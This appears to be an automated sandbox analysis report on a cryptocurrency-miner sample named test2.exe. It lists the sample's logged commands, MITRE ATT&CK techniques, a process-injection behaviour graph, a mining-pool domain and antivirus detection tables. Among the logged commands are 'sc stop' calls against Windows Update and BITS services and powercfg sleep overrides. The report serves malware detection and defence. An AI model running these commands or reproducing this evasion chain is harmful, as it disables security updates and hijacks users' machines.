      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
      MITRE ATT&CK Matrix

      Techniques flagged for this sample, grouped by tactic, with the figure the report shows beside each entry:

      Execution: Windows Management Instrumentation (11); Command and Scripting Interpreter (1); Service Execution (1); PowerShell (1)
      Persistence: Windows Service (21); DLL Side-Loading (11)
      Privilege Escalation: Windows Service (21); Process Injection (712); Abuse Elevation Control Mechanism (1); DLL Side-Loading (11)
      Defense Evasion: Rootkit (4); Masquerading (12); Disable or Modify Tools (2); Modify Registry (1); Virtualization/Sandbox Evasion (31); Process Injection (712); Hidden Files and Directories (1); Abuse Elevation Control Mechanism (1); Install Root Certificate (1); DLL Side-Loading (11); File Deletion (1)
      Credential Access: Credential API Hooking (1)
      Discovery: Security Software Discovery (111); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Information Discovery (12)
      Collection: Credential API Hooking (1)
      Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (1)
      Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no techniques flagged

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1491606 | Sample: test2.exe | Startdate: 12/08/2024 | Architecture: WINDOWS | Score: 100

Node 2 (start)
• DNS/IP: xmr.test.lol [59]
• Signatures: Multi AV Scanner detection for domain / URL [61]; Malicious sample detected (through community Yara rule) [63]; Antivirus detection for dropped file [65]; 17 other signatures [67]
• Started: test2.exe 2 [9]; updater.exe [13]; cmd.exe 1 [15]; 6 other processes [17]

Node 9 test2.exe
• Created files: C:\Users\user\AppData\...\kkldhmzqxige.tmp, PE32+ [51] (dropped); C:\Program Files\Google\Chrome\updater.exe, PE32+ [53] (dropped)
• Signatures: Suspicious powershell command line found [87]; Writes to foreign memory regions [89]; Modifies the context of a thread in another process (thread injection) [91]; 2 other signatures [109]
• Started: dialer.exe 1 [19]

Node 13 updater.exe
• Created files: C:\Windows\Temp\kkldhmzqxige.tmp, PE32+ [55] (dropped); C:\Program Files\Google\Libs\WR64.sys, PE32+ [57] (dropped)
• Signatures: Protects its processes via BreakOnTermination flag [93]; Adds a directory exclusion to Windows Defender [95]; Maps a DLL or memory area into another process [97]; Sample is not signed and drops a device driver [99]
• Started: dialer.exe [22]

Node 15 cmd.exe
• Signatures: Uses powercfg.exe to modify the power settings [101]; Stops critical windows services [103]; Modifies power options to not sleep / hibernate [105]
• Started: conhost.exe [24]; sc.exe 1 [26]; 4 other processes [34]

Node 17 (6 other processes)
• Signatures: Loading BitLocker PowerShell Module [107]
• Started: conhost.exe [28]; conhost.exe [30]; conhost.exe [32]; 14 other processes [36]

Node 19 dialer.exe
• Signatures: Suspicious powershell command line found [69]; Writes to foreign memory regions [71]; Allocates memory in foreign processes [73]
• Injected: lsass.exe [38]; winlogon.exe [41]; svchost.exe [43]; 14 other processes [47]

Node 22 dialer.exe
• Signatures: Injects code into the Windows Explorer (explorer.exe) [75]; Creates a thread in another existing process (thread injection) [77]; Injects a PE file into a foreign processes [79]
• Started: powershell.exe [45]

Node 38 lsass.exe (injected)
• Signatures: Installs new ROOT certificates [81]; Writes to foreign memory regions [83]

Node 45 powershell.exe
• Signatures: Loading BitLocker PowerShell Module [85]
• Started: conhost.exe [49]

Source | Detection | Scanner | Label | Link
test2.exe | 100% | Avira | HEUR/AGEN.1329646 | -
test2.exe | 55% | Virustotal | - | Browse
test2.exe | 100% | Joe Sandbox ML | - | -

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp | 100% | Avira | HEUR/AGEN.1362795 | -
C:\Program Files\Google\Chrome\updater.exe | 100% | Avira | HEUR/AGEN.1329646 | -
C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp | 100% | Joe Sandbox ML | - | -
C:\Windows\Temp\kkldhmzqxige.tmp | 100% | Joe Sandbox ML | - | -
C:\Program Files\Google\Chrome\updater.exe | 100% | Joe Sandbox ML | - | -
C:\Program Files\Google\Chrome\updater.exe | 55% | Virustotal | - | Browse
C:\Program Files\Google\Libs\WR64.sys | 5% | ReversingLabs | - | -
C:\Program Files\Google\Libs\WR64.sys | 4% | Virustotal | - | Browse
C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp | 87% | ReversingLabs | Win64.Trojan.Heracles | -
C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp | 82% | Virustotal | - | Browse
C:\Windows\Temp\kkldhmzqxige.tmp | 75% | ReversingLabs | Win64.Trojan.DumpDacicBitCoinMiner | -
C:\Windows\Temp\kkldhmzqxige.tmp | 76% | Virustotal | - | Browse
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/ws/2004/09/policy | 0% | Avira URL Cloud | safe | -
http://pesterbdd.com/images/Pester.png | 0% | Avira URL Cloud | safe | -
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | 0% | Avira URL Cloud | safe | -
http://nuget.org/NuGet.exe | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/wsdl/erties | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/soap/encoding/ | 0% | Avira URL Cloud | safe | -
http://nuget.org/NuGet.exe | 0% | Virustotal | - | Browse
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | 0% | Virustotal | - | Browse
http://schemas.xmlsoap.org/wsdl/erties | 0% | Virustotal | - | Browse
http://schemas.xmlsoap.org/ws/2004/09/policy | 0% | Virustotal | - | Browse
http://pesterbdd.com/images/Pester.png | 11% | Virustotal | - | Browse
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe | -
https://contoso.com/License | 0% | Avira URL Cloud | safe | -
https://contoso.com/Icon | 0% | Avira URL Cloud | safe | -
http://ocert.com | 0% | Avira URL Cloud | safe | -
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | - | Browse
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | 0% | Avira URL Cloud | safe | -
https://contoso.com/Icon | 0% | Virustotal | - | Browse
http://www.apache.org/licenses/LICENSE-2.0.htmlXz | 0% | Avira URL Cloud | safe | -
https://contoso.com/License | 0% | Virustotal | - | Browse
http://schemas.xmlsoap.org/soap/encoding/ | 0% | Virustotal | - | Browse
http://ocert.com | 0% | Virustotal | - | Browse
http://schemas.xmlsoap.org/ws/2005/02/trustock | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/wsdl/soap12/ | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | 0% | Virustotal | - | Browse
http://crl.microsof | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/wsdl/am | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/wsdl/ | 0% | Avira URL Cloud | safe | -
https://contoso.com/ | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/wsdl/soap12/ | 0% | Virustotal | - | Browse
http://www.apache.org/licenses/LICENSE-2.0.htmlXz | 0% | Virustotal | - | Browse
https://github.com/Pester/Pester | 1% | Virustotal | - | Browse
https://nuget.org/nuget.exe | 0% | Avira URL Cloud | safe | -
http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/wsdl/ | 0% | Virustotal | - | Browse
https://github.com/Pester/PesterXz | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/wsdl/am | 0% | Virustotal | - | Browse
https://aka.ms/pscore68 | 0% | Avira URL Cloud | safe | -
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | 0% | Avira URL Cloud | safe | -
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | Avira URL Cloud | safe | -
https://nuget.org/nuget.exe | 0% | Virustotal | - | Browse
https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe | -
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | Avira URL Cloud | safe | -
https://contoso.com/ | 0% | Virustotal | - | Browse
http://schemas.microsof | 0% | Avira URL Cloud | safe | -
https://github.com/Pester/PesterXz | 0% | Virustotal | - | Browse
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | Virustotal | - | Browse
https://aka.ms/pscore68 | 0% | Virustotal | - | Browse
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | Virustotal | - | Browse
http://pesterbdd.com/images/Pester.pngXz | 0% | Avira URL Cloud | safe | -
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | 0% | Virustotal | - | Browse
http://pesterbdd.com/images/Pester.pngXz | 8% | Virustotal | - | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
xmr.test.lol | unknown | unknown | true | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | false | 11%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://ocert.com | lsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXz | powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trustock | lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://crl.microsof | powershell.exe, 00000010.00000002.4472008728.00000279289F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/am | lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.quovadis.bm0 | powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500369450.00000207AA061000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5695837277.00000207AA063000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5685416645.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434488974.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/PesterXz | powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000010.00000002.4452257806.0000027910271000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
